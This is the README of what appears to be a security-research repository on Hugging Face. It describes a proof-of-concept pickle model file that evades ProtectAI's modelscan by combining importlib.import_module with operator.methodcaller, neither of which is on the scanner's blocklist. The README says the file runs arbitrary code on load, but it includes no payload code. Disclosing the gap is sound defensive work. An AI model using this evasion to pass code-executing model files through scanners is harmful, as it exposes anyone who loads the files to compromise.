Hugging Face's logo

manja316
/
modelscan-importlib-methodcaller-rce

PyTorch
English
security-research
proof-of-concept
Model card Files
xet
 Community
modelscan-importlib-methodcaller-rce / README.md
manja316's picture
manja316
Upload README.md with huggingface_hub
e5cf71d verified
preview code
|
raw
history blame contribute delete
867 Bytes
metadata 
language: en
tags:
  - security-research
  - proof-of-concept
license: mit

Security Research PoC — modelscan bypass

This repository contains a proof-of-concept model file demonstrating a bypass of ProtectAI's modelscan scanner.

DO NOT load untrusted model files. This file executes arbitrary code on load.

Vulnerability

The pickle payload uses importlib.import_module combined with operator.methodcaller to achieve code execution. Neither module is in modelscan's unsafe_globals blocklist.

Impact

Any pickle-based model file (.pkl, .bin, .pt, .pth, .ckpt) can bypass modelscan and execute arbitrary code. The fundamental issue is that blocking individual modules (os, subprocess, etc.) is insufficient when importlib.import_module can dynamically import any module at runtime.

Tested Against

modelscan 0.7.6 (latest pip release)